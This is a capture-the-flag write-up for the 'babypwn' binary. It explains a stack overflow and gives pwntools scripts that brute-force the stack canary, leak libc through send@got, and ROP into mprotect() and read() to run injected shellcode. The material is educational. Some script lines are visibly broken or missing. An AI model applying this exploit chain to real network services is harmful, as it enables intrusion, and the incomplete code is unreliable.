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256 lines (173 loc) · 8.32 KB

File metadata and controls

256 lines (173 loc) · 8.32 KB

Solved by superkojiman

I remember when baby challenges didn't require bypassing ASLR, NX, and stack canaries. babypwn is a 32-bit binary with a vanilla stack buffer overflow, and all three exploit mitigations in play.

The binary itself is pretty simple. It runs as a service on port 8181 and forks when it receives a connection. Here's the binary in action:

It also comes with a call to alarm(), and kills our connection after 5 seconds.

The meat of the program starts at 0x8048a71, which I've called menu_select().

It's possible to crash the child process when sending a very long string with either options 1 or 2, and then selecting option 3 to exit. This triggers the stack smashing protection. The vulnerability occurs at function 0x8048907, which appears to be a wrapper to recv()

recv_wrapper() (as I've called it), is called when option 1 or option 2 is selected. The buffer it copies to is 52 bytes away from menu_select()'s saved frame pointer, and 40 bytes away from menu_select()'s stack canary. The saved frame pointer and stack canary can be overwritten because recv() reads 120 bytes from the user:

Ok, so we have the vulnerability, we can overwrite the saved return pointer, now we just need to bypass the exploit mitigations.

Bypassing alarm()

This was more of an annoyance than anything else. I ended up just patching my local binary to NOP out the call to alarm() at 0x8048c14. Binary Ninja made patching easy.

Bypassing the stack canary

The binary forks, so the child process inherits the parent's memory addresses; including the stack canary's. As long as I didn't restart the parent process, the stack canary would continue to be the same for each child spawned. This made it possible to brute force the stack canary byte-by-byte. I knew it 40 bytes into my user provided buffer, so I just had to figure out what the binary would do if I guessed the wrong byte. Using Python, it turned out that I would get a EOFError exception. Otherwise it meant that I guessed correctly. Here's the script to brute force the canary:

#!/usr/bin/env python

from pwn import *

canary = ""
canary_offset = 40
guess = 0x0

buf = ""
buf += "A" * canary_offset
buf += canary

while len(canary) < 4:
    while guess != 0xff:
            r = remote("localhost", 8181)
            #r = remote("", 8888)

            r.recvuntil("Select menu > ")

            r.recvuntil("Input Your Message : ")
            r.send(buf + chr(guess))

            r.recvuntil("Select menu > ")
            d = r.recv(1024)

            # if we don't get an exception, we guessed the correct byte
            print "Guessed correct byte:", format(guess, '02x')
            canary += chr(guess)
            buf += chr(guess)
            guess = 0x0

        except EOFError,e:
            # guessed the wrong byte
            guess += 1

print "Canary:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
print "Hexdump:", hexdump(canary)

Running this returns the stack canary:

ROP chain time!

Bypassing ASLR

I assumed ASLR was enabled on the server. Why not right? With NX enabled, I couldn't execute on the stack. I needed to store my shellcode in a memory location that I could mprotect() to read/write/execute. To do that, I needed to find the address of mprotect() first. I did that by overwriting the saved return pointer with the address of send@plt and having it print out the address pointed to by send@got:

buf_1 = "A"*40
buf_1 += canary
buf_1 += "B"*12

# -- STAGE 1 ret2libc to leak address of send() and calculate libc base address

# ret2libc
buf_2 = ""
buf_2 += p32(0x8048700)   # send@plt
buf_2 += "CCCC"
buf_2 += p32(0x4)         # sockfd
buf_2 += p32(0x0804b064)  # send@got
buf_2 += p32(0x4)         # len
buf_2 += p32(0x0)         # flags
buf_2 += "D"*200

payload = buf_1 + buf_2

This returned the address of send(). The offset could be grabbed from my machine's

Subtracting the offset from the address of send() returned libc's base address. From here on, I calculated the addresses for mprotect() and read() by adding their offsets from my to libc's base address.

Bypassing NX

The next step was to make a memory location read/write/execute and store my shellcode in there. To do that, I returned to mprotect() to make 0x0804b000 read/write/execute. From there, I returned to read() which would allow me to send in my shellcode.

# -- STAGE 2 mprotect() a location to rwx and call read() to get shellcode in there --

buf_2 = ""
buf_2 += p32(addr_mprotect)
buf_2 += p32(0x08048eed)    # pop esi; pop edi; pop ebp; ret; 
buf_2 += p32(0x0804b000)    # address to mprotect()
buf_2 += p32(0x100)         # size to mprotect
buf_2 += p32(0x7)           # rwx

buf_2 += p32(addr_read)
buf_2 += p32(0x08048eed)    # pop esi; pop edi; pop ebp; ret; 
buf_2 += p32(0x4)           # sockfd
buf_2 += p32(0x0804b004)    # read shellcode in here
buf_2 += p32(0x100)         # len bytes to read

buf_2 += p32(0x0804b004)    # return to shellcode
buf_2 += "D"*200

payload = buf_1 + buf_2

Getting the flag

So locally my exploit worked to give me a shell. However that was because I had a I could use to get the offsets for the functions I wanted. The challenge didn't provide a copy of the server's, which meant I needed to figure out which libc it was using. To do that, I used and passed it the addresses of the send() function I leaked in stage 1. From there it identified the target's libc as, and I was able to get the offsets for the target's mprotect(), and send() functions.

Here's the final exploit:

#!/usr/bin/env python

from pwn import *
import sys

context(os="linux", arch="i386")

# canary returned by
canary = "\x00\x19\x78\xcc"

buf_1 = "A"*40
buf_1 += canary
buf_1 += "B"*12

# -- STAGE 1 ret2libc to leak address of send() and calculate libc base address

# ret2libc
buf_2 = ""
buf_2 += p32(0x8048700)   # send@plt
buf_2 += "CCCC"
buf_2 += p32(0x4)         # sockfd
buf_2 += p32(0x0804b064)  # send@got
buf_2 += p32(0x4)         # len
buf_2 += p32(0x0)         # flags
buf_2 += "D"*200

payload = buf_1 + buf_2

r = remote("", 8889)

r.recvuntil("Select menu > ")

r.recvuntil("Input Your Message : ")

r.recvuntil("Select menu > ")

d = r.recv()

# receive leaked address of send()
leak_send = r.recv()

print "Leaked function:"
print hexdump(leak_send)

# use to get libc version on server. 
# in this case it's we can then get
# offsets for send(), mprotect(), and read()
offset_send = 0x000ed450
offset_mprotect = 0x000e70d0
offset_read = 0x000dabd0

# calculate libc base and addresses of mprotect() and read()
libc_base = u32(leak_send) - offset_send
print "libc base:", hex(libc_base)

addr_mprotect = libc_base + offset_mprotect
print "mprotect :", hex(addr_mprotect)

addr_read = libc_base + offset_read
print "read :", hex(addr_read)


# -- STAGE 2 mprotect() a location to rwx and call read() to get shellcode in there --

buf_2 = ""
buf_2 += p32(addr_mprotect)
buf_2 += p32(0x08048eed)    # pop esi; pop edi; pop ebp; ret; 
buf_2 += p32(0x0804b000)    # address to mprotect()
buf_2 += p32(0x100)         # size to mprotect
buf_2 += p32(0x7)           # rwx

buf_2 += p32(addr_read)
buf_2 += p32(0x08048eed)    # pop esi; pop edi; pop ebp; ret; 
buf_2 += p32(0x4)           # sockfd
buf_2 += p32(0x0804b004)    # read shellcode in here
buf_2 += p32(0x100)         # number of bytes to read

buf_2 += p32(0x0804b004)    # return to shellcode
buf_2 += "D"*200

payload = buf_1 + buf_2

r = remote("", 8889)

r.recvuntil("Select menu > ")

r.recvuntil("Input Your Message : ")

r.recvuntil("Select menu > ")

d = r.recv()

# read the contents of file flag 
sc = asm("flag", 4))
print "Getting flag:", r.recvall()
